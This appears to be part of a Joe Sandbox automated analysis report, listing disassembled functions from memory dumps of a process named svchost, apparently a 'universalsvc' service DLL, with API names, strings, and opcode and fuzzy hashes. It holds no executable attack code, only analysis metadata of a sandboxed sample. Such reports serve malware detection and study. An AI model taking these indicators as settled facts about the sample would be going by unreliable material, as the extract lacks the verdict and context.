            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: Name::operator+
            • String ID:
            • API String ID: 2943138195-0
            • Opcode ID: 7a6415545121bf96a2f2749d7b0ee29708ed43ddfd64904adf30b4ffbc6aacdf
            • Instruction ID: 18a6bd7e01bb04509e6ed2cfc10306e3f5dc92a99578c157987258e7fd83c283
            • Opcode Fuzzy Hash: 7a6415545121bf96a2f2749d7b0ee29708ed43ddfd64904adf30b4ffbc6aacdf
            • Instruction Fuzzy Hash: FA715272F08A4699EB13EF65C4901EC37B5EB4578CB408836DE0D57AAADF38E615C390
            Function 00007FFA417E0D60 Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 364COMMON
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: _invalid_parameter_noinfo_noreturn$ApisFile__std_exception_copy__std_exception_destroy__std_fs_code_page
            • String ID: ", "$: "
            • API String ID: 4080386414-747220369
            • Opcode ID: efa70fbd6f32acbe59941765f86f7014a5e3dc94c7469349ed401cb701395e50
            • Instruction ID: 48355b30827b9952772555fab424d8ce591af39ee68ffca90fa9a3ec30f1b9e5
            • Opcode Fuzzy Hash: efa70fbd6f32acbe59941765f86f7014a5e3dc94c7469349ed401cb701395e50
            • Instruction Fuzzy Hash: 35E19272B08B8595EB06EF65D4843AC23B1EB46BC8F908131DB4D07BAAEF79D495C344
            Function 00007FFA4185F770 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 192COMMONLIBRARYCODE
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: Replicator::operator[]
            • String ID: `generic-type-$`template-parameter-$generic-type-$template-parameter-
            • API String ID: 3676697650-3207858774
            • Opcode ID: 3e1f19d6e438ab7e9379fa55d4a065f846d28f9fc50294b40c1f59c9183eaba8
            • Instruction ID: f49b362f2e79425c9ac8c24281b924a09cbf236c9b5e1890cbcec2fedea9f34a
            • Opcode Fuzzy Hash: 3e1f19d6e438ab7e9379fa55d4a065f846d28f9fc50294b40c1f59c9183eaba8
            • Instruction Fuzzy Hash: D1817926A0CA8699FB23AF21D4502B837A1EB5A74CF848532DA4D537B6DF3CF545C740
            Function 00007FFA417CBEF0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 157COMMON
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: Concurrency::cancel_current_taskstd::_$Lockit$Locinfo::_Locinfo_ctorLockit::_Lockit::~_
            • String ID: bad locale name$false$true
            • API String ID: 4121308752-1062449267
            • Opcode ID: d65148452f5e7adacad9643930f7b73dec780b70eb6e19a5f2d12b80b21efa29
            • Instruction ID: 464869080d234b46faf955baa95c583ec8818e85392f2143b80a0691241352e2
            • Opcode Fuzzy Hash: d65148452f5e7adacad9643930f7b73dec780b70eb6e19a5f2d12b80b21efa29
            • Instruction Fuzzy Hash: C1613D22B0D7418AFB17EFB0D4503BD27B5AF46748F548038DE4D27AA6EE38B4569344
            Function 00007FFA417D0B00 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 139COMMONLIBRARYCODE
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: Xinvalid_argumentstd::_
            • String ID: Can not switch from automatic to manual indexing$Can not switch from manual to automatic indexing$Invalid format string.$Number is too big$}
            • API String ID: 909987262-2617750137
            • Opcode ID: 9e820ddc437df5c9e36bb94561ecae091b3e11d17c2f936c628e370132d2eeea
            • Instruction ID: fe5a37989851cd3417bcb1b4ce908d6e2cb77d6e08425f29205f456816eda4bd
            • Opcode Fuzzy Hash: 9e820ddc437df5c9e36bb94561ecae091b3e11d17c2f936c628e370132d2eeea
            • Instruction Fuzzy Hash: 51519622A0C64A85DB27AB18E0501BD7370FF52B88F94D532D75D425F6EF2DE581CB48
            Function 00007FFA417DB930 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 137COMMON
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: Xinvalid_argumentstd::_
            • String ID: Can not switch from automatic to manual indexing$Can not switch from manual to automatic indexing$Invalid format string.$Number is too big$}
            • API String ID: 909987262-2617750137
            • Opcode ID: 8464d5bc04a8de789215cf5a13d7e47d57cd794df2a6ec7e3b7bdaa8b157e610
            • Instruction ID: 85010854f44cb5ca59646558586609c75193ba73409b68c3a4233123c50865d0
            • Opcode Fuzzy Hash: 8464d5bc04a8de789215cf5a13d7e47d57cd794df2a6ec7e3b7bdaa8b157e610
            • Instruction Fuzzy Hash: C351A422A0C58E85DB57AB28D0501B97370EF93745F548531D3AD431F7EF2DE686CA09
            Function 00007FFA4185B4BC Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 126COMMONLIBRARYCODE
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: Name::operator+
            • String ID: `unknown ecsu'$class $coclass $cointerface $enum $struct $union
            • API String ID: 2943138195-1464470183
            • Opcode ID: 5e1fe7b5236ca9fc109eba89ffb5c6bb728c9febe0ec77c823811000e643dc5a
            • Instruction ID: e505d09569443d19ca3959c26cd33024f54b043d910ae967bdc70ee40fb9734e
            • Opcode Fuzzy Hash: 5e1fe7b5236ca9fc109eba89ffb5c6bb728c9febe0ec77c823811000e643dc5a
            • Instruction Fuzzy Hash: 62513922E0CB16C9FB17EF65E8805AC37B1FB5638CF508435EA0D66AA5DF28E544C710
            Function 6828D270 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 112COMMON
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2337881551.0000000068281000.00000020.00000001.01000000.00000019.sdmp, Offset: 68280000, based on PE: true
            • Associated: 0000002E.00000002.2337800612.0000000068280000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2338814328.0000000068296000.00000004.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2338878664.0000000068297000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339257856.00000000682A0000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339331155.00000000682A1000.00000004.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339387487.00000000682A4000.00000008.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339424514.00000000682A5000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339424514.00000000682EC000.00000002.00000001.01000000.00000019.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_68280000_svchost.jbxd
            Similarity
            • API ID: signal
            • String ID: CCG
            • API String ID: 1946981877-1584390748
            • Opcode ID: 01f8e4c4d1a19d00ad60ef520917e7cdb6b4237445d121632a71a9a355f36039
            • Instruction ID: d27226b85bcb93a9f3255e4fa10b6670b7ae65bfe50647b281e8467d6d08727b
            • Opcode Fuzzy Hash: 01f8e4c4d1a19d00ad60ef520917e7cdb6b4237445d121632a71a9a355f36039
            • Instruction Fuzzy Hash: 013154E1B0450E87FF6946BA44503392101AB8A33AFD58B27D97D873E5CF1DC8DD4A12
            Function 00007FFA4185D1C4 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 111COMMONLIBRARYCODE
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: Name::operator+
            • String ID: cli::array<$cli::pin_ptr<$std::nullptr_t$std::nullptr_t $void$void
            • API String ID: 2943138195-2239912363
            • Opcode ID: cdff2b580c51411059274661d36839feaa1db8aacfab0d2e903fa2f1fd28df11
            • Instruction ID: e7942764f7fe1ae00e0cfa265a5135d3d0271a538a91dcf4ad66705904000985
            • Opcode Fuzzy Hash: cdff2b580c51411059274661d36839feaa1db8aacfab0d2e903fa2f1fd28df11
            • Instruction Fuzzy Hash: 2F510862E1CB5698FB13AF60D8412BC37A0EB0675DF448636DE4D266A5DF3CB144C710
            Function 00007FFA417D5240 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 177COMMON
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: std::_$Lockit$Concurrency::cancel_current_taskLocinfo::_Locinfo_ctorLockit::_Lockit::~_
            • String ID: bad locale name$false$true
            • API String ID: 3230409043-1062449267
            • Opcode ID: 5fc55fd21848c481d300cee93076aa780238a10cd033d528215a27615c23e593
            • Instruction ID: e9033dde088524a46192d57f0cebe2f9b5d18e46fc417f4ea38bdba43f7a8127
            • Opcode Fuzzy Hash: 5fc55fd21848c481d300cee93076aa780238a10cd033d528215a27615c23e593
            • Instruction Fuzzy Hash: F7815E22B1DB8186EB12EF70D4802AD77B0FF85748F549135EA8D27A6ADF38E491C744
            Function 00007FFA417F09C0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 126COMMON
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: std::_$Lockit$GetcollLocinfo::_Locinfo_ctorLockit::_Lockit::~__invalid_parameter_noinfo_noreturn
            • String ID: \s+$bad locale name
            • API String ID: 3908275632-2606225191
            • Opcode ID: cf04b3abbb3fbb8494344bd742d89da18a9a5b969823627a3290b2fb8ec1eb62
            • Instruction ID: 31daf6c3f4f7bfa5c1e58d9883d99bafdf4374b2f79b608cadd05a450f08570b
            • Opcode Fuzzy Hash: cf04b3abbb3fbb8494344bd742d89da18a9a5b969823627a3290b2fb8ec1eb62
            • Instruction Fuzzy Hash: 1C514C22B09A418AFB13EFB0D4502AD3376EF46748F448135DF4D27BAADE38A5559388
            Function 68290090 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 115stringCOMMON
            Download Yara Rule
            APIs
            • strlen.MSVCRT ref: 68290117
              • Part of subcall function 68294A10: ___lc_codepage_func.MSVCRT ref: 68294A42
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2337881551.0000000068281000.00000020.00000001.01000000.00000019.sdmp, Offset: 68280000, based on PE: true
            • Associated: 0000002E.00000002.2337800612.0000000068280000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2338814328.0000000068296000.00000004.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2338878664.0000000068297000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339257856.00000000682A0000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339331155.00000000682A1000.00000004.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339387487.00000000682A4000.00000008.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339424514.00000000682A5000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339424514.00000000682EC000.00000002.00000001.01000000.00000019.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_68280000_svchost.jbxd
            Similarity
            • API ID: ___lc_codepage_funcstrlen
            • String ID: %*.*S$%-*.*S$%.*S
            • API String ID: 962473550-2115465065
            • Opcode ID: 510814f8fe546983e93e9dcc38a1f95ea66455a78fca4571207376ec9573c394
            • Instruction ID: 0ab926ddb62d0b250be1d6b0493ac056b3dc13929d8b5f14602960803c593450
            • Opcode Fuzzy Hash: 510814f8fe546983e93e9dcc38a1f95ea66455a78fca4571207376ec9573c394
            • Instruction Fuzzy Hash: A531B17371464DC6DF558F2BE80476D77A1E781BA8F98C225DE688B748EB39C541CB00
            Function 00007FFA4185FE4C Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 88libraryloaderCOMMONLIBRARYCODE
            Download Yara Rule
            APIs
            • LoadLibraryExW.KERNEL32(?,00000000,?,00007FFA41860053,?,?,00000000,00007FFA41854B5E,?,?,?,00007FFA41854749), ref: 00007FFA4185FED1
            • GetLastError.KERNEL32(?,?,00000000,00007FFA41854B5E,?,?,?,00007FFA41854749), ref: 00007FFA4185FEDF
            • LoadLibraryExW.KERNEL32(?,?,00000000,00007FFA41854B5E,?,?,?,00007FFA41854749), ref: 00007FFA4185FF09
            • FreeLibrary.KERNEL32(?,?,00000000,00007FFA41854B5E,?,?,?,00007FFA41854749), ref: 00007FFA4185FF77
            • GetProcAddress.KERNEL32(?,?,00000000,00007FFA41854B5E,?,?,?,00007FFA41854749), ref: 00007FFA4185FF83
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: Library$Load$AddressErrorFreeLastProc
            • String ID: ': $api-ms-
            • API String ID: 2559590344-2775044410
            • Opcode ID: 1cbb0e533028a347ded5b771b5de51c2b4e49b4d74a556ded3c8f6cb3392ee87
            • Instruction ID: 31a0cfa7e79fdaa4966964865ece07eb7552b2624dfff39c68635b6677182366
            • Opcode Fuzzy Hash: 1cbb0e533028a347ded5b771b5de51c2b4e49b4d74a556ded3c8f6cb3392ee87
            • Instruction Fuzzy Hash: 6E31B221B1EA4291EF17AF16A80053963A4FF47BA8F498535ED1D4BBA6EF3CF4458340
            Function 00007FFA417EF550 Relevance: 12.2, APIs: 8, Instructions: 245COMMON
            Download Yara Rule
            APIs
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: std::_$Lockit$Lockit::_Lockit::~_$_invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskFacet_RegisterSetgloballocale__std_exception_copystd::locale::_
            • String ID:
            • API String ID: 1589743132-0
            • Opcode ID: 4affefb6a32d44342c660ac3fca9004272aa80984d5d35650bf6e373c28eb61f
            • Instruction ID: 88d64fbf907590950f763d69cb6f648e70c622ed8d08994bb38a0d5c0da235cb
            • Opcode Fuzzy Hash: 4affefb6a32d44342c660ac3fca9004272aa80984d5d35650bf6e373c28eb61f
            • Instruction Fuzzy Hash: DFA1BE32B08B4186EB12EF61D8403AC33B1FB9A758F558235DA5D57BA6DF38E091C744
            Function 00007FFA418670AC Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 490COMMONLIBRARYCODE
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: _invalid_parameter_noinfo
            • String ID: f$p$p
            • API String ID: 3215553584-1995029353
            • Opcode ID: 4111e40542dbe3c1f3943ae55c068fff9b97fda351d2e0389a177bbe7fae8d17
            • Instruction ID: a059ad9a93dea5e0ae97f0fa9a8893d241e3cac1d6cc945b8a804ae177191c02
            • Opcode Fuzzy Hash: 4111e40542dbe3c1f3943ae55c068fff9b97fda351d2e0389a177bbe7fae8d17
            • Instruction Fuzzy Hash: DB128261E0C28385FB277B15E05877A7662EB82754FD4C136E69E466E4DF3CF8808B90
            Function 00007FFA41860DA8 Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 476COMMON
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: _invalid_parameter_noinfo
            • String ID: f$p$p
            • API String ID: 3215553584-1995029353
            • Opcode ID: dc88254be005a811713ed9997bea8f29745d65432a2c085724142b0a6929da94
            • Instruction ID: 7a7e8f277cb7b743f7c00b484d8adcddc8afd5507cd6a9ef490d10a15b3154d6
            • Opcode Fuzzy Hash: dc88254be005a811713ed9997bea8f29745d65432a2c085724142b0a6929da94
            • Instruction Fuzzy Hash: 5312A061E0D58386FB27BB15E15467A76A2EBC2750FC4C131E68E47AE9DB3CF5808B04
            Function 00007FFA417F1470 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 173COMMON
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: _invalid_parameter_noinfo_noreturn
            • String ID: C:\(universalsvc) Service DLL\universalsvc\packages\include\nlohmann\json.hpp$m_data.m_type != value_t::array || m_data.m_value.array != nullptr$m_data.m_type != value_t::binary || m_data.m_value.binary != nullptr$m_data.m_type != value_t::object || m_data.m_value.object != nullptr$m_data.m_type != value_t::string || m_data.m_value.string != nullptr
            • API String ID: 3668304517-4140447594
            • Opcode ID: 07e32b68dd295c9948062d56699bd56e0e0a6a0ff4e8793ced9d88c809dde9ef
            • Instruction ID: c965cfb8baba9f82358cc7c6d22080a8d4ed2173f2c0a2d606a621763ffb2d99
            • Opcode Fuzzy Hash: 07e32b68dd295c9948062d56699bd56e0e0a6a0ff4e8793ced9d88c809dde9ef
